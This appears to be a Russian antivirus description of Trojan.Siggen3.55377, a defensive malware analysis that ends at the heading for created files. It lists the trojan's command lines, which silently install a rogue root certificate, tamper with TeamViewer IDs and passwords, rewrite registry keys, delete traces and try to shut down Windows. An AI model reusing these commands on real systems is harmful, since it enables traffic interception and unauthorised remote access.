Trojan.Siggen3.55377

Техническая информация

Вредоносные функции:

Создает и запускает на исполнение:

%APPDATA%\ChangeID\box.exe l1 50 100 s4 "cm.dat"
%APPDATA%\ChangeID\box.exe w2 xd2 xc1 "#32770" 20683 "700000000"
%APPDATA%\ChangeID\box.exe w2 xc3 xc1 "#32770" xd2 xc1 "#32770" 20104 "627-654-522"
%APPDATA%\ChangeID\cm.exe /add "cm" /s Root /r currentUser /all
%APPDATA%\ChangeID\box.exe w2 xd2 xc1 "#32770" 20104 "627-654-522"
%APPDATA%\ChangeID\box.exe c3 xr2 "~$vfq5tz.vn0$\cm.dll"
%APPDATA%\ChangeID\box.exe w2 xc3 xc1 "#32770" xd2 xc1 "#32770" 20099 "7000"
%APPDATA%\ChangeID\box.exe w2 xd2 xc1 "#32770" 20190 "700000000"
%APPDATA%\ChangeID\box.exe s7 xs4 "TeamViewer3"
%APPDATA%\ChangeID\box.exe w2 xr3 xc1 "#32770"
%APPDATA%\ChangeID\cm.exe /add "cm" /s Root /r localMachine /all
%APPDATA%\ChangeID\box.exe c3 xc2
%APPDATA%\ChangeID\box.exe r6 xb0 "HKLM~$vs0.k$~$vs0.k1$" "Blob" "~$c3$"
%APPDATA%\ChangeID\box.exe b0 5000 70
%APPDATA%\ChangeID\box.exe w2 xc3 xc1 "#32770" xd2 xc1 "#32770" 20782 "627-654-522"
%APPDATA%\ChangeID\box.exe w2 xd2 xc1 "#32770" 20098 "700 000 000"
%APPDATA%\ChangeID\box.exe r6 xb0 "HKCU~$vs0.k$~$vs0.k1$" "Blob" "~$c3$"
%APPDATA%\ChangeID\box.exe w2 xc3 xc1 "#32770" xd2 xc1 "#32770" 20098 "700 000 000"
%APPDATA%\ChangeID\box.exe w2 xd1 xc1 "#32770" 2
%APPDATA%\ChangeID\box.exe e3 xh1 cmd /c "echo. & set "K=HKCU\Software\Box\ChangeID" & set "K1=HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\~$vs0.NUMBER_OF_PROCESSORS$~$vs0.PROCESSOR_REVISION$~$vs0.PROCESSOR_LEVEL$" & call reg query "%K1%" || (call reg query "%K%" || (box r6 xd0 "~~$vs0.k$" "~~$vc0y4w91.yMM$" "%RANDOM%%RANDOM%" & exit) & call reg query "%K%" /v "~$vc0y4w91.yMM$" && exit & box r6 xs9 "~~$vs0.k1$\Shell" "~$vs0. $" "~$vs0. $" & exit) & box w2 xd2 xc1 "#32770" 20172 "ICQ 627-654-522 - безлимит для TeamViewer от $10""
%APPDATA%\ChangeID\rst.exe c7 4197 e4 xr0 xf1
%APPDATA%\ChangeID\box.exe s7 xs4 "TeamViewer7"
%APPDATA%\ChangeID\box.exe e3 xh1 cmd /c "echo. & box s7 xs4 "TeamViewer7" & box s7 xs4 "TeamViewer6" & box s7 xs4 "TeamViewer5" & box s7 xs4 "TeamViewer4" & box s7 xs4 "TeamViewer3" & pushd "%HOMEPATH%\temp\TeamViewer" & attrib +r "Version4\*.h*" & attrib +r "Version5\*.h*" & popd & pushd "%TEMP%\TeamViewer" & attrib +r "Version5\*.h*" & attrib +r "Version6\*.h*" & attrib +r "Version7\*.h*" & attrib +r "Version8\*.h*" & popd & exit"
%APPDATA%\ChangeID\box.exe s19 "~$vn1.ve0$" "~$vfq5tz.vn0$\rst.exe" xn0 xs8 xy0
%APPDATA%\ChangeID\box.exe e3 xh1 cmd /c "echo. & set "K=\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates" & set "K1=\BF915674FD4942A60CCC8A9E102A8E1448FCD079" & call reg query "HKLM%K%%K1%" /v "Blob" && (del /a /f /q "cm.*" & exit) & call reg query "HKCU%K%%K1%" /v "Blob" && (del /a /f /q "cm.*" & exit) & box w2 xd1 xc1 "#32770" 2 & box w2 xd1 xc1 "#32770" 7 & box c3 xr2 "~~$vfq5tz.vn0$\cm.dll" & start "" box l1 50 100 s4 "cm.dat" & cm /add "cm" /s Root /r currentUser /all && (box r6 xb0 "HKCU~~$vs0.k$~~$vs0.k1$" "Blob" "~~$c3$") & cm /add "cm" /s Root /r localMachine /all && (box r6 xb0 "HKLM~~$vs0.k$~~$vs0.k1$" "Blob" "~~$c3$") & box c3 xc2 & ren "cm.*" "tmp.*" & del /a /f /q "*tmp*""
%APPDATA%\ChangeID\box.exe e3 xh1 cmd /c "echo. & set "K1=HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\~$vs0.NUMBER_OF_PROCESSORS$~$vs0.PROCESSOR_REVISION$~$vs0.PROCESSOR_LEVEL$" & if "~$vc0y4w91.yMM$" lss "1111" ( box r6 xs9 "~~$vs0.k1$\Shell" "~$vs0. $" "~$vs0. $" ) else echo & if "~$vc0y4w91.yMM$" gtr "1206" ( box r6 xs9 "~~$vs0.k1$\Shell" "~$vs0. $" "~$vs0. $" ) else exit"
%APPDATA%\ChangeID\box.exe f0 "*cmd*"
%APPDATA%\ChangeID\box.exe w2 xd2 xc1 "#32770" 20099 "7000"
%APPDATA%\ChangeID\box.exe w2 xd1 xc1 "#32770" 7
%APPDATA%\ChangeID\box.exe s7 xs4 "TeamViewer4"
%APPDATA%\ChangeID\box.exe r6 xd0 "~$vs0.k$" "~$vc0y4w91.yMM$" "80441468"
%APPDATA%\ChangeID\box.exe k0 "~$vfq5tz.vn0$\rst.exe"
%APPDATA%\ChangeID\box.exe s7 xs4 "TeamViewer6"
%APPDATA%\ChangeID\box.exe e3 xh1 cmd /c "echo. & box k0 "~~$vfq5tz.vn0$\rst.exe" & del /a /f /q "rst.exe" & set "ID1=700000000" & set "ID2=700 000 000" & call box w2 xd2 xc1 "#32770" 20190 "%ID1%" & call box w2 xd2 xc1 "#32770" 20683 "%ID1%" & call box w2 xd2 xc1 "#32770" 20098 "%ID2%" & call box w2 xc3 xc1 "#32770" xd2 xc1 "#32770" 20098 "%ID2%""
%APPDATA%\ChangeID\box.exe s7 xs4 "TeamViewer5"
%APPDATA%\ChangeID\box.exe e3 xh1 cmd /c "echo. & set "Pass=7000" & set "Num=627-654-522" & call box w2 xd2 xc1 "#32770" 20099 "%Pass%" & call box w2 xc3 xc1 "#32770" xd2 xc1 "#32770" 20099 "%Pass%" & call box w2 xd2 xc1 "#32770" 20104 "%Num%" & call box w2 xc3 xc1 "#32770" xd2 xc1 "#32770" 20104 "%Num%" & call box w2 xc3 xc1 "#32770" xd2 xc1 "#32770" 20782 "%Num%" & box b0 5000 70 & box w2 xr3 xc1 "#32770""

Запускает на исполнение:

<SYSTEM32>\attrib.exe +r "Version5\*.h*"
<SYSTEM32>\attrib.exe +r "Version4\*.h*"
<SYSTEM32>\attrib.exe +r "Version6\*.h*"
<SYSTEM32>\attrib.exe +r "Version8\*.h*"
<SYSTEM32>\attrib.exe +r "Version7\*.h*"
<SYSTEM32>\reg.exe query "HKCU\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\BF915674FD4942A60CCC8A9E102A8E1448FCD079" /v "Blob"
<SYSTEM32>\reg.exe query "HKLM\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\BF915674FD4942A60CCC8A9E102A8E1448FCD079" /v "Blob"
<SYSTEM32>\reg.exe query "HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags\22c026"
<SYSTEM32>\logonui.exe /status /shutdown
<SYSTEM32>\reg.exe query "HKCU\Software\Box\ChangeID"

Пытается завершить работу операционной системы Windows.

Изменения в файловой системе:

Создает следующие файлы: